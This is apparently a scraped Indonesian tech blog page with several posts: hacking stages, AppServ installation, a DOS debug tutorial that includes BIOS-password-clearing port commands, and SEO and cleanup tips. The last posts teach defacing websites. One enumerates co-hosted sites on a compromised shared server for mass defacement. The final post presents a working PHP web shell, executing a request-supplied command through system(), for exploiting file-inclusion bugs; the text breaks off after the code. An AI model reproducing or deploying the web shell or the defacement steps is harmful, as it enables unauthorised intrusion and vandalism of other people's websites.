Tahap Dalam Melakukan Hacking







Dalam info kali ini saya akan membahas mengenai tahapan-tahapan dalam melakukan aktivitas hacking. Dalam sebuah buku Hacking Exposed karangan Stuard McClure, Joel Scambray dan George Kurtz, proses hacking dibagi menjadi beberapa langkah :





Footprinting
Proses mencari informasi tentang korban/target sebanyak-banyaknya. Dilakukan dengan mencari data-data melalui internet ataupun cara lainnya


Scanning
Proses lanjutan dengan melakukan analisa servis yang dijalankan server dan router di internet, biasanya dilakukan dengan ping, nmap, dll.

Enumeration
Proses lanjutan dengan mencoba koneksi kedalam mesin korban / target.

Gaining Access
Proses pengambil alihan ke target berdasarkan informasi yang didapat sebelumnya.

Escalating Privilage
Meningkatkan hak akses apabila telah berhasil masuk kedalam sistem pada server / router.

Covering Tracks
Proses penghapusan jejak segala macam log pada server/router agar tidak bisa dilacak.

Creating BackDoors
Menciptakan sebuah jalan rahasia dari sebuah sistem router/server agar bisa memasuki sistem kembali.

Denial Of Service
Biasanya cara ini dilakukan oleh seorang hacker yang telah putus asa atau gagal dalam mengambil alih sistem korban. Denial Of Service lebih dikenal dengan nama DoS/DDos dimana bisa menyebabkan server/router restart, bahkan rusak ( crash )

Langkah diatas adalah langkah umum yang dilakukan untuk melakukan kejahatan internet, cara lain pun banyak dilakukan mulai dari cara yang tidak biasanya yang biasanya hanya mengandalkan logika dalam pemecahan masalah.


Untuk tutorial DoS ( Denial Of Service ) akan saya bahas tersendiri dalam postingan lainnya.

Related Posts:

Cara Instal Aplikasi AppServ versi 2.5.8

Sebelumnya saya pernah memberikan info mengenai aplikasi ini beserta link untuk di download. Sekarang saya akan memberikan info, bagaimana meng-install aplikasi tersebut. Setelah kalian selesai mendownload silakan ikuti cara berikut :

1. Klik ganda Appserv-win32-xxxexe untuk menginstal AppServ di komputer Kalian.




2.  License Agreement : AppServ distribusi dibawah GNU / GPL License. kalian harus membaca perjanjian lisensi sebelum menginstal. Jika kalian setuju untuk lisensi ini klik Next untuk ke langkah berikutnya. Jika kalian tidak setuju klik Batal untuk membatalkan instalasi.





3. Choose Install Location: Lokasi default AppServ adalah C: AppServ. Jika kalian perlu mengubah tujuan klik Browse Botton untuk mengubah tujuan kalian untuk program AppServ dan kemudian klik Next untuk ke langkah berikutnya. 





4. Select Components : komponen default paket AppServ itu diperiksa paket semua.
            Jika kalian perlu memilih beberapa paket untuk menginstal. Kalian dapat klik pada kotak cek.
                  - Apache HTTP Server adalah Server Web.
                  - Database MySQL Database Server.
                  - PHP Hypertext Preprocessor adalah PHP Programming prosesor.
                  - phpMyAdmin adalah kontrol MySQL Database melalui WWW.
            Jika kalian selesai memilih maka klik Next untuk ke langkah berikutnya.
 






5. Apache Configuration : Apache Konfigurasi: ini layar untuk menetapkan Apache mengkonfigurasi.
                  Nama Server kalian harus menentukan Server Name misalnya Localhost.
                  Admin Email kalian harus menentukan Email Admin misalnya root@appservnetwork.com
                  HTTP Port kalian harus menentukan port HTTP untuk Web Server Apache.
 






6. Konfigurasi MySQL:
    Root Password          kalian harus memasukan password root untuk MySQL Database.
                                       Default user untuk password ini adalah root.
    Tentukan Karakter    Set untuk bahasa penyimpanan data dan collations.
    Old Password            Jika kalian memiliki masalah ketika kalian coding kode PHP dengan Old MySQL API. Dan Klien ditemukan kesalahan tidak mendukung protokol otentikasi diminta oleh server; mempertimbangkan untuk mengupgrade klien MySQL kalian harus memeriksa opsi ini untuk menghindari kesalahan.
                                           
    Aktifkan InnoDB     Jika kalian menggunakan InnoDB harus memeriksa opsi ini.
 





7. Complete AppServ setup : Setup meminta mulai Apache dan MySQL segera. Klik Finish untuk mengakhiri setup ini dan AppServ prompt untuk digunakan. 


 

Related Posts:

Download free AppServ V.2.5.8


Sever web dibutuhkan untuk melakukan pemograman yang membutuhkan teknologi sever-side, seperti PHP, ColdFusion, ASP dan JSP. Oleh karena itu, web server merupakan peralatan yang penting untuk melakukan uji coba pemograman sever-side yang kalian buat. Dengan demikian kalian tidak perlu melakukan upload data kesebuah hosting hanya untuk mengetahui hasil pemogramanpada sisi sever.

Pemograman sever-side biasanya digunakan untuk mengakses database yang terdapat pada sever hosting, sehinga pengembangan dengan mudah mengelola content website tanpa mengubah halaman-halaman web.

Salah satu teknologi aplikasi sever web yang lengkap yang dapat kalian gunakan adalah aplikasi AppServ versi 2.5.8 yang merupakan kumpulan aplikasi pendukung pembangunan website.Pada paket AppServ versi 2.5.8 terdapat aplikasi-aplikasi seperti :
  • Server web Apache versi 2.2.4
  • Bahasa Script PHP versi 5.2.1
  • PhpMyAdmin Database Manager versi 2.9.2
  • Database MySQL versi 5.0.27

Aplikasi AppServ versi 2.5.8 ini disediakan secara gratis yang bisa digunakan tanpa perlu membayar.


Untuk cara peng-instalanya bisa kalian baca disini

Related Posts:

Cara 100% Aman Dari Serangan Hacker


Info kali ini akan membahas bagaimana caranya 100% aman dari serangan Hacker. Caranya sangatlah simple yaitu dengan MENUTUP PORT KALIAN.
Kita sering mendengar berita-berita yang mengatakan bahwa suatu situs, komputer ataupun server dapat diterobos masuk melalui port yang terbuka. Menyerang sebuah komputer pun terlebih dahulu harus melihat port-port yang terbuka barulah kemudian melakukan serangan.
Intinya seorang Hacker selalu menyerang atau masuk melalui port yang terbuka. Kemudian karena hal ini juga banyak yang bertanya,
" Ohh,, kalau begitu kenapa tidak kita tutup saja port-nya supaya kita aman dari serangan nakal hacker "
Benar sekali, dengan menutup semua port yang terbuka maka secara otomatis kita akan aman dari serangan Hacker. lalu kenapa tidak dilakukan ?? atau bagaimana cara melakukannya ??

Sebelumnya saya terangkan dulu, bahwa didalam komputer terdapat dua jenis Port yaitu Port Fisik dan Port Logikal. Port fisik mencakup bagian seperti COM1, COM2, Parallel, Audio Jack, USB, dll. Untuk postingan kali ini saya akan lebih membahas mengenai Port Logikal karena Port Fisik yang saya terangkan tadi tidaklah berhubungan dengan aktivitas seorang hacker. Lalu apa pula Port Logikal itu ?.

Port Logikal ibarat sebuah PINTU dirumah kalian. Ya sesuai dengan nama, maka dengan adanya pintu tersebut maka seorang pencuri dapat masuk kerumah kita, akan tetapi dengan pintu tersebut kita dapat keluar rumah dan melakukan aktivitas kita seperti sekolah, kuliah, kerja, dll. Lalu bagaimana kalau kita menutup semua PINTU tersebut,,?? atau lebih tepatnya, bagaimana kalau kita menghilangkan seluru pintu dirumah kita,,??
" Benar, Pencuri pun tidak akan bisa masuk kedalam rumah kita akan tetapi kita pun tidak bisa keluar dari rumah untuk melakukan aktivitas kita. "

Sangat sederhana bukan. Mudah dimengerti kenapa aktivitas hacking tidak bisa dicega dengan menutup semua port. Dengan menutup semua port, artinya komputer kita menghilangkan komunikasi kita dengan komputer luar. Chatting, Browsing, Email dan seribu satu fasilitas lainnya tidak bisa kita nikmati. karena untuk menikmati fasilitas-fasilitas tersebut kita harus membuka port ( PINTU ) kita.

Sebagai contoh, saat kalian membuka blog ini http://infoduniaterbaru.blogspot.com/, maka komputer kalian akan membuka port diatas 1024 secara acak, dan dipilih secara acak oleh sistem operasi dan membuka port 80 pada http://infoduniaterbaru.blogspot.com/. Terdapat dua port yang terbuka, yaitu port komputer kalian dan port di server.

Ilustrasinya seperti ini, Untuk membeli sebatang rokok diwarung, hal pertama kali yang harus kita lakukan adalah berjalan kearah pintu untuk keluar rumah, kemudian membuka pintu tersebut lalu berjalan kewarung untuk mendapatkan sebatang rokok.

Baiklah sekarang saya sudah mengetahuinya, tapi bagaimana jika saya tetap ingin menghilangkan semua komunikasi ini dengan dunia luar agar 100% terhindar dari serangan Hacker,?
cara paling mudah adalah mencabut semua kabel jaringan kalian, matikan semua jaringan Wifi dan Lan kalian.

Dengan menghilangkan semua komunikasi dengunia luar tentunya kabel jaringan, Wifi maupun lan tidak akan dibutuhkan lagi bukan. Adakah cara lain ??
Ada, Matikan saja komputer kalian dan tidurlah dengan tenang sekarang. Dengan begitu maka kalian 100% aman dari serangan Hacker.

  • Perlu diketahui bahwa tidak ada cara yang 100% aman dari serangan Hacker, karena Hacking adalah proses dan yang namanya proses akan selalu berkembang, begitu juga dengan cara mengatasinya, yang bisa kita lakukan sekarang adalah melihat perkembangan dari gerak gerik/ aktivitas hacking tersebut. dengan begitu kalian bisa menemukan cara menanggulanginya.

Related Posts:

Belajar Debug | Cara crack windows, program dll secara manual

Debug adalah program yang datang dengan versi modern DOS. Biasanya semua pengguna Windows seharusnya sudah memilikinya.

Ini adalah alat untuk debuging program, unassembling dan cracking, dan membaca area memori "tersembunyi" seperti sektor boot, dan banyak lagi.





Masuk ke DOS dan ketik "debug", Anda akan mendapatkan prompt seperti ini:
-

Kemudian ketik "?" ( tanpa tanda petik ) untuk melihat perintah-perintah yang dapat digunakan.

assemble A [address]
compare C range address
dump D [range]
enter E address [list]
fill F range list
go G [=address] [addresses]
hex H value1 value2
input I port
load L [address] [drive] [firstsector] [number]
move M range address
name N [pathname] [arglist]
output O port byte
proceed P [=address] [number]
quit Q
register R [register]
search S range list
trace T [=address] [value]
unassemble U [range]
write W [address] [drive] [firstsector] [number]
allocate expanded memory XA [#pages]
deallocate expanded memory XD [handle]
map expanded memory pages XM [Lpage] [Ppage] [handle]
display expanded memory status XS


Mari kita lalui masing-masing perintah:

-A
107A: 0100

Pada titik ini Anda dapat mulai merakit beberapa program, seperti menggunakan sebuah assembler. Namun debug assembler sangat terbatas. Mari kita mencoba untuk memasukkan program yang sederhana:

-A
107A: 0100 MOV AH, 02
107A: 0102 MOV DL, 41
107A: 0104 INT 21
107A: 0106 INT 20
-G
A

Program dihentikan biasanya

Perhatikan bagaimana kalian menjalankan program yang baru saja kalian masukkan dengan "g", dan juga perhatikan bagaimana bagian set-up tidak ada? Itu karena debug hanya terlalu terbatas untuk mendukung itu.
Hal lain yang dapat kalian lakukan dengan assembler adalah menentukan alamat di mana Anda ingin memulai, secara default ini adalah 0100 karena itulah di mana semua file COM.

Bandingkan memakan waktu 2 blok memori dan menampilkan mereka berdampingan, byte untuk byte. Mari kita lakukan contoh. Cukup keluar dari debug jika kalian belum sudah menggunakan "q". Sekarang ketik

"debug c: \ command.com"

-C 0100 l 8 0200
10A3: 0100 7A 06 10A3: 0200

Perintah ini di-compare dengan offset 0100 0200 untuk panjang 8 byte. Debug menanggapi dengan lokasi yang BERBEDA. Jika 2 lokasi adalah debug, sama hanya akan menghilangkan mereka, jika semua adalah sama debug hanya akan kembali ke prompt tanpa tanggapan.
Dump:

Dump akan dump segmen memori tertentu. Untuk menguji ini, kode program assembly lagi:

C: \ debug>
-A
107A: 0100 MOV AH, 02
107A: 0102 MOV DL, 41
107A: 0104 INT 21
107A: 0106 INT 20
-D l 8 0100
107A: 0100 B4 02 B2 41 CD 21 CD 20
... A.!.

The "B4 02 B2 41 CD 21 CD 20" adalah program yang baru saja dibuat dalam bahasa mesin.

B4 02 MOV AH =, 02
B2 41 MOV DL =, 41
CD 21 = INT 21
CD 20 = INT 20

The "... A.!." bagian merupakan program kalian dalam ASCII. The "." merupakan karakter non-printable. Perhatikan A di sana.

Ini adalah salah satu perintah keras. Dengan itu kalian dapat memasukkan / mengubah area memori tertentu. Mari kita ubah program kami sehingga mencetak B bukannya suatu A.
-E 0103 <- mengedit program di segmen 0103
107A: 0103 41,42 <- perubahan 41-42
-G
B

Program dihentikan biasanya
-
Bukankah itu menakjubkan?

Perintah ini cukup berguna, tapi siapa yang tahu ....
Perintah ini mengisi jumlah tertentu memori dengan data tertentu. Mari kita misalnya membersihkan semua memori dari segmen 0100-0108, yang kebetulan program kami.
-F 0100 l 8 0 <- file offset 0100 untuk panjang 8 byte dengan 0
-D 0100 l 8 <- memverifikasi bahwa hal itu berhasil
107A: 0100 00 00 00 00 00 00 00 00 .......
Yap, itu berhasil.


Sejauh ini kami menggunakan Go (g) untuk memulai program baru saja kita buat. Tapi Go dapat digunakan untuk banyak lagi. Sebagai contoh, katakanlah kita ingin mengeksekusi program di 107B: 0100:
-R CS <- mengatur CS mendaftar untuk menunjuk ke 107B
CS 107A
: 107B
-G = 100


Kalian juga dapat mengatur breakpoints.
-A <- masukkan program asli kita sehingga kita memiliki sesuatu
107A: 0100 MOV AH, 02 untuk bekerja dengan
107A: 0102 MOV DL, 41
107A: 0104 INT 21
107A: 0106 INT 20
-G 102 <- menyiapkan jalur istirahat di 107A: 0102


Pada titik ini program akan berhenti, menampilkan semua register dan instruksi saat ini.
Hex:

Hal ini dapat sangat berguna. Ini mengurangi dan menambahkan dua nilai heksadesimal:
-H 2 1
0003 0001 <- 2h + 1 + = 3h dan 2h - 1h = 1h


Hal ini sangat berguna untuk menghitung panjang program, karena kalian akan lihat nanti.

input:
Ini adalah salah satu perintah yang lebih maju, dan saya memutuskan untuk tidak membicarakannya terlalu banyak untuk saat ini. Ini akan membaca byte data dari komputer kalian port I / O (keyboard, mouse, printer, dll).

-I 3FD
60
-


Data anda mungkin berbeda.
Jika kalian ingin tahu, 3FD adalah Com port 1, juga dikenal sebagai Asynchronous Pertama Adapter.
Load:

Perintah ini memiliki 2 format. Hal ini dapat digunakan untuk memuat nama file tertentu dengan perintah nama (n), atau dapat memuat sektor tertentu.

-N c: \ command.com
-L

Hal ini akan memuat command.com ke debug. Ketika sebuah program yang valid dimuat semua register akan dibentuk dan siap untuk melaksanakan program.
Metode lainnya adalah sedikit lebih rumit, tetapi potensial juga lebih berguna. Perintahnya adalah

L <address> <sector> letter/> <drive <amount untuk load>
-L 100 2 10 20


Hal ini akan memuat dimulai pada 0100 offset dari drive C (0 = A, 1 = B, 2 = C, dll), sektor 10h 20h sektor. Hal ini dapat berguna untuk memulihkan file Anda dihapus.
Pindah:

Pindahkan mengambil byte dari alamat awal dan bergerak ke alamat tujuan. Hal ini sangat baik untuk memindahkan data sementara ke daerah bebas, dari pada memanipulasi tanpa harus khawatir tentang mempengaruhi program asli. Hal ini terutama berguna jika digunakan bersama dengan perintah r yang saya akan mendapatkan nanti. Mari kita mencoba sebuah contoh:

-A <- masukkan program asli kita sehingga kita memiliki sesuatu
107A: 0100 MOV AH, 02 untuk bekerja dengan
107A: 0102 MOV DL, 41
107A: 0104 INT 21
107A: 0106 INT 20
-M 107A: 0100 L 8 107B: 0100 <- lebih 8 byte mulai dari 107A: 0100 menjadi 107B: 0100
E-107B: 0103 <- edit 107B: 0103
107B: 41,42 0103 <- dan mengubahnya 42 (
-D 107A: 0100 L 8 <- pastikan itu berhasil
107A: 0100 B4 02 B2 41 CD 21 CD 20 ... A.!.
-D 107B: 0100 L 8
107A: 0100 B4 02 B2 42 CD 21 CD 20 ... B.!.
-M 107B: 0100 L 8 107A: 0100 <- mengembalikan program asli karena kita menyukai perubahan.

 Nama:
Ini akan mengatur debug dengan sebuah nama berkas digunakan untuk I / O perintah. Anda harus menyertakan ekstensi file, dan kalian dapat menggunakan perintah tambahan:

-N c: \ command.com
Output:


Tepatnya apa yang kalian pikirkan. Output mengirimkan barang ke port I / O. Jika kalian memiliki modem eksternal dengan lampu yang keren di atasnya, kalian dapat menguji hal ini. Cari tahu apa port modem kalian aktif dan menggunakan nomor hex yang sesuai di bawah ini:

Com 1 = 3F8 - 3FF (3DF untuk tambang)
Com 2 = 2F8 - 2FF
Com 3 =??? -??? (Jika seseorang tahu, tolong beritahu saya)


Sekarang giliran pada bit (Data Terminal Ready) DTA dengan mengirimkan 01h untuk itu:
-O XXX 1 <- XXX adalah port com dalam hex

Segera setelah kalian tekan enter, lihat di modem Anda, kalian akan melihat lampu menyala. Anda bisa bersenang-senang bahkan lebih dengan perintah output. Katakanlah seseorang meletakkan salah satu password BIOS pada komputer "kalian". Biasanya kalian akan harus mengambil baterai untuk menyingkirkan, tapi sekarang tidak lagi:

MI / AWARD BIOS
-O 70 17
-O 71 17

QPHOENIX BIOS
-O 70 FF
-O 71 17

QGENERIC
-O 70 2E
-O 71 FF


Perintah-perintah ini akan menghapus BIOS memori, sehingga melumpuhkan password.

Hasil dalam pelaksanaan program, biasanya digunakan bersama-sama Trace menganjal, yang saya akan mencakup nanti. Seperti pergi perintah, kalian dapat menentukan alamat dari mana untuk memulai

menggunakan alamat =
-P 2

Debug akan merespon dengan register dan perintah saat ini akan dieksekusi.
Cukup:

Ini harus menjadi fitur yang paling maju dari debug, itu keluar debug!

-Q
Pendaftaran:

Perintah ini dapat digunakan untuk menampilkan nilai saat ini dari semua register, atau mengaturnya secara manual. Hal ini sangat berguna untuk menulis file-file karena anda akan lihat nanti.

-R AX
AX: 011B
: 5
-


Perintah lain yang sangat berguna. Hal ini digunakan untuk mencari terjadinya byte tertentu, atau serangkaian byte di segmen. Data untuk mencari bisa dengan baik karakter, atau nilai hex. nilai Hex dimasukkan dengan spasi atau koma di antara mereka, dan karakter yang diapit dengan tanda kutip (tunggal atau ganda). kalian juga dapat mencari hex dan karakter dengan string yang sama:

-Nc: \ command.com <- load command.com sehingga kita memiliki beberapa data untuk mencari di
-L
-S 0 l 0 "MS-DOS" <- search seluruh blok memori untuk "MS-DOS"
10A3: 39E9 <- menemukan string di 10A3: 39E9

CATATAN: pencarian kasus sensitif!

Trace:
Ini adalah fitur yang benar-benar besar debug. Ini akan menelusuri melalui instruksi satu program pada satu waktu, menampilkan instruksi dan register setelah masing-masing. Seperti pergi perintah Anda dapat menentukan di mana untuk memulai eksekusi dari, dan untuk berapa lama.

-A <- ya, hal ini lagi
107A: 0100 MOV AH, 02
107A: 0102 MOV DL, 41
107A: 0104 INT 21
107A: 0106 INT 20
-T = 0100 8


Jika kalian meninggalkan jumlah instruksi yang Anda ingin melacak, Anda dapat menggunakan dilanjutkan (p) untuk melanjutkan pelaksanaan selama Anda inginkan.
Unassemble:

Unassembles blok kode. Bagus untuk debugging (dan cracking)

-U 100 L 8 <- unassembles 8 byte dimulai pada offset 100
107A: 0100 MOV AH, 02 <- respon debut's
107A: 0102 MOV DL, 41
107A: 0104 INT 21
107A: 0106 INT 20


Perintah ini bekerja sangat mirip dengan Load. Ia juga memiliki 2 cara dapat beroperasi: menggunakan nama, dan dengan menentukan lokasi yang tepat. Lihat kembali ke Load untuk informasi lebih lanjut

Related Posts:

Panduan Dasar Internet

Internet adalah jaringan komputer yang terdiri dari ribuan jaringan di seluruh dunia. Tidak ada yang tahu persis berapa banyak komputer yang terhubung ke Internet. Sudah pasti penggunanya diatas angka jutaan.
Tidak ada yang bertanggung jawab atas Internet. Memang ada organisasi yang mengembangkan aspek-aspek teknis dari jaringan dan standar ditetapkan untuk membuat berbagai aplikasi didalamnya, namun tidak ada badan yang memegang kendali.

Related Posts:

Hacking Registry Windows XP

Registry adalah kunci system dari komputer, seandainya salah satu system terhapus ataupun error maka komputer kita tidak akan berjalan dengan sempurna lagi,,
sebelum saya memberikan info mengenai Registry terlebih dahulu kenali apa itu Windows Registry.

Related Posts:

Formula Google PageRank

kali ini saya sedikit memberikan info tentang bagaimana cara google menghitung pagerank kita. Sistem Google PageRank memang cukup rumit, terlebih jika kalian tidak menyukai matematika.. hehehe
Jika kita memang bener mau serius terjun dibidang webmastering ini,  adalah ide bagus untuk mempelajarinya.

Related Posts:

Cara Membuat Menu Horizontal Dropdown ( Versi 2 )

Sebelumnya saya pernah mem-posting tentang menu navigasi horizontal dropdown yang bisa kalian lihat disini, kali ini saya akan memberikan versi lainnya.
Menu navigasi secara default belum tersedia di template blogspot. Untuk menampilkan atau membuat menu navigasi perlu ditambahkan script agar menu tersebut muncul di bagian header blog. Dalam postingan ini kita akan membuat menu navigasi  horisotal sederhana menggunakan script css.

Related Posts:

Cara Menampilkan Widget Header

 Widget Header untuk template blogspot terkadang tidak muncul pada Elemen laman, hal ini akan menyulitkan jika kita akan membuat/menambah gadget pada widget header/tab header
Jika kalian menggunakan template default blogger, maka kalian akan mengalami kesulitan untuk menyisipkan gadget ke bagian header blog. Karena fungsi add gadget dinonaktifkan oleh blogger. kalian bisa mengaktifkan gadget tersebut, kemudian bisa menyisipkan obyek seperti script html/javascript, link, gambar, atau widget tertentu.

Related Posts:

Cara Membersihkan Temporary File

Temporary File atau file sampah adalah file yang hanya sementara yang biasanya dibutuhkan pada saat menginstal software/program baru kedalam PC atau Laptop.
Membersihkan file sampah windows di hardisk sebaiknya dilakukan secara berkala, tergantung banyaknya perubahan atau pemakaian aplikasi pada komputer kalian. Ada beberapa software yang bisa digunakan untuk menghapus file tersebut dalam satu kali klik, seperti Tune Up 2009, System mechanics, dan lain-lain.

Jika tidak punya software di atas, maka kalian bisa melakukan secara manual, yaitu mencari folder tempat file sampah tersebut berada kemudian menghapus file-file sampah yang ada dalam direktori tersebut.

Caranya tidak sulit, cukup menemukan dimana file-file tersebut berada :

Sebelumnya tampilkan file-file yang terhidden, caranya klik Folder option > view > show hidden files, folder and drivers.

kemudian masuk ke windows explorer, file temporary biasanya terdapat di :

1. C:\Documents and Settings\daffy\My Recent Documents

Keterangan: daffy adalah nama user yang aktif di komputer saya, sesuaikan dengan user yang aktif di komputer anda.
Blok (sorot) semua file yang ada di sebelah kanan, kemudian hapus (delete)
File-file ini hanyalah rekaman shorcut (bisa dihapus) tanpa merusak windows.

2. C:\WINDOWS\Prefetch

Hapus semua file yang terdapat didalamnya.

3. C:\WINDOWS\Temp

Hapus semua file yang terdapat didalamnya.

4. C:\Documents and Settings\daffy\Local Settings\Temp

Keterangan: daffy adalah nama user yang aktif di komputer saya, sesuaikan dengan user yang aktif di komputer anda.
Blok (sorot) semua file yang ada di sebelah kanan, kemudian hapus (delete)

Buat tambahan, buka juga folder recycle bin kalian terus hapus semua, biar hardisk-nya bisa digunakan untuk file yang lebih penting.

Related Posts:

Pahami Google Page Rank

Dari berbagai macam teknik dari SEO yang katanya dapat memperbaiki posisi kita di-search engine, namun metode apakah yang digunakan google untuk memutuskan situs manakah yang lebih baik, jawabannya adalah Sistem PageRank.

Related Posts:

Dasar Optimasi SEO Onpage

Teknik SEO terbagi menjadi dua macam yaitu Onpage dan Offpage. Onpage dilakukan dengan cara mengatur dari dalam website/bog, seperti memaksimalkan keyword dan deskripsi agar lebih mudah ditemukan oleh mesin pencari. sedangkan Offpage SEO adalah memanfaatkan ruang diluar website/blog kita, misalnya dengan mencantumkan atau berbagi link/banner.

Related Posts:

Mencari Alamat Target didalam satu Hosting

TULISAN INI HANYALAH DI PERUNTUKKAN UNTUK PARA NEWBIES,
JADI KALO ENTE MERASA UDAH EXPERT, MERASA UDAH PINTER, KALO
MERASA... AH POKOKE KALO KALIAN ITU UDAH HEBAT, MAKA
DILARANG DAN SANGAT TERLARANG MEMBACA TULISAN INI DEMI
KEBAIKAN KALIAN SENDIRI. PENULIS TIDAK MENJAMIN JIKA KALIAN KELAK
BAKAL MATI KEBOSANAN KARENA MEMBACA TULISAN INI.
TERIMA KASIH.


Hmm... bila kalian semua udah pada baca artikel saya sebelumnya tentang “php-bugs dan permisi file” sehingga dapat mendeface dalam satu hosting walau target yang aslinya gak sempet kita deface. Nah, mungkin timbul pertanyaan dibenak kalian... Gimana seh caranya kita tahu and liat nama situs target yang kita deface dalam satu hosting itu.
Bisa dimengerti toH..!!!!??? :)

Gini loh, misalnya kita mendapatkan target www.contoh.com trus kita dapatin id yang kita jalankan di target adalah nobody (ini enggak mutlak lho, bisa aja id user yang kita jalankan adalah apache ato www-data pokoke prinsipnya kite memiliki hak menulis di target).

Nah setelah kite cek dan ricek, eh...... kita bisa melakukan mass defacing di sana :P~ (slurpp......) (ini kalo memang permisi file di target memungkinkan kita untuk melakukan mass defacing tapi kale kalian gak bisa ngelakuin mass defacing di target kalian, gak ada salahnya buat baca terus ini artikel, sapa tau di sana kalian dapatin web jualan misalnya, walo gak bisa deface, paling enggak bisa lah sekedar liat-liat suasana,  wakakaka...... ☺☺☺)

Hehehe...... kembali ke pokok masalah, langkah selanjutnya adalah melihat directori aktif kita saat ini. Bukan apa-apa, tujuan sebenarnya dari tindakan ini adalah untuk melihat dimana kita berpijak saat ini, soalnya kebanyakan (bahkan hampir semua target) nyatuin semua directory web dalam satu directory untuk memudahkan administrasi.

$pwd
/home/recompil/public_html

Lalu kita melihat di sana bahwa directory aktif saat ini adalah /home/recompil/public_html. Jika kita melihat directory aktif target tersebut, maka kita berasumsi bahwa admin menyatukan semua directory web usernya
ada di bagian /home.

Lho, kok di bagian /home seeh ??? Bukannya di /home/recompil ???
OK... kita simpan dulu pertanyaan tersebut. Entar kita membahasnya OK.
Lalu langkah kedua adalah melihat daftar user-user web yang berada di bagian
directory /home dengan menggunakan command ls –la.

$ls –la /home
total 4620
drwxr-xr-x 273 root root 8192 Aug 4 13:00 .
drwxr-xr-x 16 root root 4096 Nov 30 2003 ..
drwx--x--x 7 abbeydis abbeydis 4096 Jun 22 07:39 abbeydis
drwxrwxrwx 7 acebroth acebroth 4096 Jun 22 02:28 acebroth
drwxrwxrwx 7 rattanwa rattanwa 4096 Jun 22 05:24 rattanwa
drwx--x--x 7 raygiubi raygiubi 4096 Jun 22 02:28 raygiubi
drwx--x--x 14 recompil recompil 4096 Jun 22 07:09 recompil

Nah, itu adalah hasil dari command ls –la di directory /home trus langkah selanjutnya adalah menentukan name site target yang bakal kite deface dalam 1 hosting dengan target asli kite ☺☺☺
Oh iya, tadi ada yang tanyakan kenapa directory web usernya ada di bagian /home dan bukan di bagian
/home/recompil. Nah, sebenarnya di bagian /home/recompil ada folder /public_html, file itu memang bawaan yang menjadi ciri khas apache, jadi sebenarnya letak web user itu ada di /home bukannya di /home/recompile.

next, kita gak perlu berhenti di sini. Langkah selanjutnya adalah melihat dimana letak httpd.conf target kita. Guna httpd.conf adalah sebagai configurasi apache dalam mengatur server. Lalu tujuan kita mencari  httpd.conf itu adalah untuk melihat vhost name server target kita (sebenarnya dari sana langsung bisa juga
seh tanpa perlu gunain command pwd ama ls –la segala ☺, tapi kayaknya gak menarik, soalnya entar tulisan ini gak penuh, wekekeke ☺☺☺).
Ada beberapa cara dalam mencari httpd.conf target. Salah satunya adalah :

$locate httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf.bak
/etc/httpd/conf/httpd.conf.old
/etc/httpd/conf/httpd.conf.new

Jika kita melihat fila hasil output dari command locate, maka jangan dulu
bingung file mana yang harus dilihat. Kita ambil file httpd.conf tanpa embelembel
segala sebagi patokan, jadi bukan httpd.conf.bak ato httpd.conf.old. Ingat
httpd.conf tanpa embel-embel yah.
Trus, kita liat deh tuh httpd.conf dengan perintah cat, caranya

$cat /etc/httpd/conf/httpd.conf
..........
<VirtualHost 66.45.242.178> ServerAlias www.abbeydistribution.com
abbeydistribution.com
ServerAdmin webmaster@abbeydistribution.com
DocumentRoot /home/abbeydis/public_html
BytesLog dmlogs/abbeydistribution.c
oom-bytes_log ServerName www.abbeydistribution.com
User abbeydis
Group abbeydis
CustomLog domlogs/abbeydistribution.com combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........

Sebenarnya tampilan file httpd.conf bukan seperti yang kalian lihat itu, itu hanya sekedar contoh pada bagian vhost user abbeydis yang memiliki site www.abbeydistribution.com yang meletakkan file-file webnya di directory /home/abbeydis/public_html.
Seep, gimana... udah ngerti kan apa yang saya maksudkan ☺☺☺

Namun, nah ini namun yah... terkadang di beberapa target, command locate malah gak mau jalan, entah itu dikatain bahwa command locate gak ada dalam daftar command-command yang bisa mereka handle-lah ato... pokoke yang jelas mereka ngatain bahwa yang namanya locate itu gak ada, udah digusur kali ama
adminnya :P~ Hehehehe

Nah, gimana neh kalo seandainya itu yang terjadi ???
Pengalaman saya sendiri seeh saya gunain command whereis dengan argumen ke httpd sebagai binnary-nya ato file executenya apache. Jadi command yang saya jalankan adalah whereis httpd kemudian setelah dapat hasilnya penulis lakukan command cat /<hasil dari command whereis httpd> ditambah dengan /conf/httpd.conf. jadi intinya begini loh :

$whereis httpd
/etc/httpd/httpd
$cat /ect/httpd/conf/httpd.conf
..........
<VirtualHost 66.45.242.178> ServerAlias www.abbeydistribution.com
abbeydistribution.com
ServerAdmin webmaster@abbeydistribution.com
DocumentRoot /home/abbeydis/public_html
BytesLog domlogs/abbeydistribution.com-bytes_log
ServerName www.abbeydistribution.com
User abbeydis
Group abbeydis
CustomLog domlogs/abbeydistribution.com combined
ScriptAlias /cgi-bin/ /home/abbeydis/public_html/cgi-bin/
</VirtualHost>
..........

Nah, mungkin ada beberapa teknik lain yang belom saya kuasai, seperti melihatnya melalui file-file configurasi DNS di target misalnya :P~ tetapi menurut saya ini sudahlah cukup. :)

Related Posts:

Deface dengan PHP Bugs

Kali ini saya ingin membahas tentang bug yang udah lama, soalnya saya pribadi paling jarang baca-baca tentang bug baru, dan paling malas ngikutin perkembangan zaman,hehehe. makanye saya di sini bakal nulis bug yang udah lama. Bug ini saya namain bug “tusuk-tusuk” tapi mungkin semua pada bilang ini bug namanya inject php bug ☺.
Sebelum kita memulai ngelakuin bug ini di target kita, ada baiknya kalian semua mengcopy dan paste code berikut ini ke website kalian, entah itu di geocities, portland, atau di hosting kalian terserah dah... 
Ini dia code yang mesti kalian copy-paste ke site kalian semua ( note : bagi ente-ente yang udah ada code ini di site kalian, gak perlu lagi, ini bagi yang belom ada aja ).

</center></center><br><font face="verdana" size="7"><center><b>CMD</b> - System
Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Re-DESIGN by : <b>m_beben from #kartubeben @ Dalnet</b><br>
<br>
<br>
<hr>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;",
$output));
?>
</font></pre>
